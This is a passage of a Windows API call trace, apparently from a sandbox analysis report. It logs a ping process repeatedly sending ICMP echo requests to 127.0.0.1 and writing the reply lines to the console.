lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0040.887] _fileno (_File=0x76ea4c28) returned 1 [0040.887] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0040.887] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0040.887] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe37fe8 [0040.887] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe37fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0040.887] _fileno (_File=0x76ea4c28) returned 1 [0040.887] _write (in: _FileHandle=1, _Buf=0xe37fe8*, _MaxCharCount=0x16 | out: _Buf=0xe37fe8*) returned 22 [0040.888] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0040.888] _fileno (_File=0x76ea4c28) returned 1 [0040.888] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0040.888] LocalFree (hMem=0xe37fe8) returned 0x0 [0040.888] LocalFree (hMem=0xe37ac8) returned 0x0 [0040.888] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0040.888] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0040.888] _fileno (_File=0x76ea4c28) returned 1 [0040.888] _get_osfhandle (_FileHandle=1) returned 0x28 [0040.888] GetFileType (hFile=0x28) returned 0x2 [0040.888] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0040.888] GetLastError () returned 0x6 [0040.888] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0040.888] _fileno (_File=0x76ea4c28) returned 1 [0040.888] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0040.888] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0040.888] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0040.888] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0040.888] _fileno (_File=0x76ea4c28) returned 1 [0040.888] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0040.888] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0040.888] _fileno (_File=0x76ea4c28) returned 1 [0040.888] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0040.888] LocalFree (hMem=0xe28a78) returned 0x0 [0040.888] LocalFree (hMem=0xe37fe8) returned 0x0 [0040.888] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="翨ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0040.888] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0040.888] _fileno (_File=0x76ea4c28) returned 1 [0040.888] _get_osfhandle (_FileHandle=1) returned 0x28 [0040.888] GetFileType (hFile=0x28) returned 0x2 [0040.888] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0040.888] GetLastError () returned 0x6 [0040.888] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0040.888] _fileno (_File=0x76ea4c28) returned 1 [0040.888] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0040.888] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0040.888] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0040.888] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0040.888] _fileno (_File=0x76ea4c28) returned 1 [0040.888] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0040.888] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0040.888] _fileno (_File=0x76ea4c28) returned 1 [0040.888] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0040.888] LocalFree (hMem=0xe28a78) returned 0x0 [0040.888] LocalFree (hMem=0xe37fe8) returned 0x0 [0040.888] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0040.888] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0040.889] _fileno (_File=0x76ea4c28) returned 1 [0040.889] _get_osfhandle (_FileHandle=1) returned 0x28 [0040.889] GetFileType (hFile=0x28) returned 0x2 [0040.889] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0040.889] GetLastError () returned 0x6 [0040.889] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0040.889] _fileno (_File=0x76ea4c28) returned 1 [0040.889] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0040.889] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0040.889] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0040.889] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0040.889] _fileno (_File=0x76ea4c28) returned 1 [0040.889] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0040.889] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0040.889] _fileno (_File=0x76ea4c28) returned 1 [0040.889] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0040.889] LocalFree (hMem=0xe28a78) returned 0x0 [0040.889] LocalFree (hMem=0xe37fe8) returned 0x0 [0040.889] Sleep (dwMilliseconds=0x3e8) [0041.901] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0041.902] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0041.902] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0041.902] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0041.902] _fileno (_File=0x76ea4c28) returned 1 [0041.902] _get_osfhandle (_FileHandle=1) returned 0x28 [0041.902] GetFileType (hFile=0x28) returned 0x2 [0041.902] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0041.902] GetLastError () returned 0x6 [0041.902] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0041.902] _fileno (_File=0x76ea4c28) returned 1 [0041.902] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0041.902] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0041.902] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe37fe8 [0041.902] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe37fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0041.902] _fileno (_File=0x76ea4c28) returned 1 [0041.902] _write (in: _FileHandle=1, _Buf=0xe37fe8*, _MaxCharCount=0x16 | out: _Buf=0xe37fe8*) returned 22 [0041.902] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0041.902] _fileno (_File=0x76ea4c28) returned 1 [0041.902] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0041.902] LocalFree (hMem=0xe37fe8) returned 0x0 [0041.902] LocalFree (hMem=0xe37ac8) returned 0x0 [0041.902] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0041.902] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0041.902] _fileno (_File=0x76ea4c28) returned 1 [0041.902] _get_osfhandle (_FileHandle=1) returned 0x28 [0041.903] GetFileType (hFile=0x28) returned 0x2 [0041.903] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0041.903] GetLastError () returned 0x6 [0041.903] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0041.903] _fileno (_File=0x76ea4c28) returned 1 [0041.903] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0041.903] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0041.903] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28958 [0041.903] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0041.903] _fileno (_File=0x76ea4c28) returned 1 [0041.903] _write (in: _FileHandle=1, _Buf=0xe28958*, _MaxCharCount=0x9 | out: _Buf=0xe28958*) returned 9 [0041.903] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0041.903] _fileno (_File=0x76ea4c28) returned 1 [0041.903] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0041.903] LocalFree (hMem=0xe28958) returned 0x0 [0041.903] LocalFree (hMem=0xe37fe8) returned 0x0 [0041.903] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="翨ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0041.903] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0041.903] _fileno (_File=0x76ea4c28) returned 1 [0041.903] _get_osfhandle (_FileHandle=1) returned 0x28 [0041.903] GetFileType (hFile=0x28) returned 0x2 [0041.903] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0041.903] GetLastError () returned 0x6 [0041.903] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0041.903] _fileno (_File=0x76ea4c28) returned 1 [0041.903] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0041.903] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0041.903] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0041.903] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0041.903] _fileno (_File=0x76ea4c28) returned 1 [0041.903] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0041.903] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0041.903] _fileno (_File=0x76ea4c28) returned 1 [0041.903] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0041.903] LocalFree (hMem=0xe28a78) returned 0x0 [0041.903] LocalFree (hMem=0xe37fe8) returned 0x0 [0041.903] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0041.903] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0041.903] _fileno (_File=0x76ea4c28) returned 1 [0041.903] _get_osfhandle (_FileHandle=1) returned 0x28 [0041.903] GetFileType (hFile=0x28) returned 0x2 [0041.903] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0041.903] GetLastError () returned 0x6 [0041.903] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0041.903] _fileno (_File=0x76ea4c28) returned 1 [0041.903] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0041.903] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0041.904] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0041.904] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0041.904] _fileno (_File=0x76ea4c28) returned 1 [0041.904] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0041.904] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0041.904] _fileno (_File=0x76ea4c28) returned 1 [0041.904] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0041.904] LocalFree (hMem=0xe28a78) returned 0x0 [0041.904] LocalFree (hMem=0xe37fe8) returned 0x0 [0041.904] Sleep (dwMilliseconds=0x3e8) [0042.913] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0042.914] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0042.914] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0042.914] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0042.914] _fileno (_File=0x76ea4c28) returned 1 [0042.914] _get_osfhandle (_FileHandle=1) returned 0x28 [0042.914] GetFileType (hFile=0x28) returned 0x2 [0042.914] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0042.914] GetLastError () returned 0x6 [0042.914] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0042.914] _fileno (_File=0x76ea4c28) returned 1 [0042.914] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0042.914] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0042.914] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe37fe8 [0042.914] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe37fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0042.914] _fileno (_File=0x76ea4c28) returned 1 [0042.914] _write (in: _FileHandle=1, _Buf=0xe37fe8*, _MaxCharCount=0x16 | out: _Buf=0xe37fe8*) returned 22 [0042.914] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0042.914] _fileno (_File=0x76ea4c28) returned 1 [0042.914] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0042.914] LocalFree (hMem=0xe37fe8) returned 0x0 [0042.914] LocalFree (hMem=0xe37ac8) returned 0x0 [0042.914] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0042.914] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0042.914] _fileno (_File=0x76ea4c28) returned 1 [0042.914] _get_osfhandle (_FileHandle=1) returned 0x28 [0042.914] GetFileType (hFile=0x28) returned 0x2 [0042.914] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0042.914] GetLastError () returned 0x6 [0042.914] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0042.914] _fileno (_File=0x76ea4c28) returned 1 [0042.914] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0042.914] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0042.914] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28910 [0042.914] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0042.914] _fileno (_File=0x76ea4c28) returned 1 [0042.915] _write (in: _FileHandle=1, _Buf=0xe28910*, _MaxCharCount=0x9 | out: _Buf=0xe28910*) returned 9 [0042.915] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0042.915] _fileno (_File=0x76ea4c28) returned 1 [0042.915] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0042.915] LocalFree (hMem=0xe28910) returned 0x0 [0042.915] LocalFree (hMem=0xe37fe8) returned 0x0 [0042.915] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="翨ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0042.915] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0042.915] _fileno (_File=0x76ea4c28) returned 1 [0042.915] _get_osfhandle (_FileHandle=1) returned 0x28 [0042.915] GetFileType (hFile=0x28) returned 0x2 [0042.915] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0042.915] GetLastError () returned 0x6 [0042.915] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0042.915] _fileno (_File=0x76ea4c28) returned 1 [0042.915] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0042.915] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0042.915] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a90 [0042.915] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0042.915] _fileno (_File=0x76ea4c28) returned 1 [0042.915] _write (in: _FileHandle=1, _Buf=0xe28a90*, _MaxCharCount=0x9 | out: _Buf=0xe28a90*) returned 9 [0042.915] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0042.915] _fileno (_File=0x76ea4c28) returned 1 [0042.915] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0042.915] LocalFree (hMem=0xe28a90) returned 0x0 [0042.915] LocalFree (hMem=0xe37fe8) returned 0x0 [0042.915] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0042.915] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0042.915] _fileno (_File=0x76ea4c28) returned 1 [0042.915] _get_osfhandle (_FileHandle=1) returned 0x28 [0042.915] GetFileType (hFile=0x28) returned 0x2 [0042.915] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0042.915] GetLastError () returned 0x6 [0042.915] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0042.915] _fileno (_File=0x76ea4c28) returned 1 [0042.915] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0042.915] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0042.915] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0042.915] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0042.915] _fileno (_File=0x76ea4c28) returned 1 [0042.915] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0042.916] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0042.916] _fileno (_File=0x76ea4c28) returned 1 [0042.916] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0042.916] LocalFree (hMem=0xe28a78) returned 0x0 [0042.916] LocalFree (hMem=0xe37fe8) returned 0x0 [0042.916] Sleep (dwMilliseconds=0x3e8) [0043.922] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0043.922] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0043.922] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0043.922] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0043.922] _fileno (_File=0x76ea4c28) returned 1 [0043.922] _get_osfhandle (_FileHandle=1) returned 0x28 [0043.922] GetFileType (hFile=0x28) returned 0x2 [0043.923] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0043.923] GetLastError () returned 0x6 [0043.923] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.923] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0043.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0043.923] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe37fe8 [0043.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe37fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.923] _write (in: _FileHandle=1, _Buf=0xe37fe8*, _MaxCharCount=0x16 | out: _Buf=0xe37fe8*) returned 22 [0043.923] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.923] _setmode 